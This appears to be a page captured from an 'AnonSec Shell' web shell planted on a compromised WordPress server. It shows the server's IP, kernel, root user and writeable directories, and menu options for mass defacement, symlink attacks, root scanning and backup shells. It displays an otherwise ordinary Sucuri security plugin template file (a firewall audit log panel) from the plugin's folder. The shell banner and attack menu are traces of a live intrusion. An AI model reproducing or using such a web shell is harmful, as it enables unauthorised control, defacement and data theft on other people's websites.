AnonSec Shell
Server IP : 104.21.14.48  /  Your IP : 3.137.211.107   [ Reverse IP ]
Web Server : Apache
System : Linux b70eb322-3aee-0c53-7c82-0db91281f2c6.secureserver.net 6.1.90-1.el9.elrepo.x86_64 #1 SMP PREEMPT_DYNAMIC Thu May 2 12:09:22 EDT 2024 x86_64
User : root ( 0)
PHP Version : 8.0.30.2
Disable Function : NONE
Domains : 0 Domains
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/wp-content/plugins/sucuri-scanner/inc/tpl/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /var/www/wp-content/plugins/sucuri-scanner/inc/tpl/firewall-auditlogs.html.tpl
<div class="sucuriscan-panel">
    <h3 class="sucuriscan-title">{{Firewall Audit Logs}}</h3>

    <div class="inside">
        <p>{{The firewall logs every request involved in an attack and separates them from the legitimate requests. You can analyze the data from the latest entries in the logs using this tool and take action either enabling the advanced features of the IDS <em>(Intrusion Detection System)</em> from the <a href="https://waf.sucuri.net/?settings" target="_blank" rel="noopener">Firewall Dashboard</a> and/or blocking IP addresses and URL paths directly from the <a href="https://waf.sucuri.net/?audit" target="_blank" rel="noopener">Firewall Audit Trails</a> page.}}</p>

        <div class="sucuriscan-inline-alert-info">
            <p>{{Non-blocked requests are hidden from the logs, this is intentional.}}</p>
        </div>

        <script type="text/javascript">
        /* global jQuery */
        /* jshint camelcase: false */
        jQuery(document).ready(function ($) {
            $('#sucuriscan-firewall-auditlogs-button').on('click', function (event) {
                event.preventDefault();

                var params = {};

                $('.sucuriscan-firewall-auditlogs tbody')
                .html('<tr><td><em>{{Loading...}}</em></td></tr>');

                params.action = 'sucuriscan_ajax';
                params.form_action = 'get_firewall_logs';
                params.sucuriscan_page_nonce = '%%SUCURI.PageNonce%%';
                params.sucuriscan_query = $('#sucuriscan_firewall_query').val();
                params.sucuriscan_month = $('#sucuriscan_firewall_month').val();
                params.sucuriscan_year = $('#sucuriscan_firewall_year').val();
                params.sucuriscan_day = $('#sucuriscan_firewall_day').val();

                $.post('%%SUCURI.AjaxURL.Dashboard%%', params, function (data) {
                    if (data.match(/sucuriscan-alert/)) {
                        data = '<tr><td>' + data + '</td></tr>';
                    }

                    $('.sucuriscan-firewall-auditlogs tbody').html(data);
                });
            });

            $('#sucuriscan-firewall-auditlogs-button').click();
        });
        </script>

        <form action="%%SUCURI.URL.Firewall%%#auditlogs" method="post">
            <fieldset class="sucuriscan-clearfix">
                <label>Search:</label>
                <input type="text" id="sucuriscan_firewall_query" />
                <select id="sucuriscan_firewall_day">%%%SUCURI.AuditLogs.DateDays%%%</select>
                <select id="sucuriscan_firewall_month">%%%SUCURI.AuditLogs.DateMonths%%%</select>
                <select id="sucuriscan_firewall_year">%%%SUCURI.AuditLogs.DateYears%%%</select>
                <button id="sucuriscan-firewall-auditlogs-button" class="button button-primary">{{Submit}}</button>
            </fieldset>

            <table class="wp-list-table widefat sucuriscan-table sucuriscan-firewall-auditlogs">
                <thead>
                    <tr>
                        <th>{{Firewall Audit Logs}}</th>
                    </tr>
                </thead>

                <tbody>
                    <tr>
                        <td><em>{{Loading...}}</em></td>
                    </tr>
                </tbody>
            </table>
        </form>
    </div>
</div>

Anon7 - 2022
AnonSec Team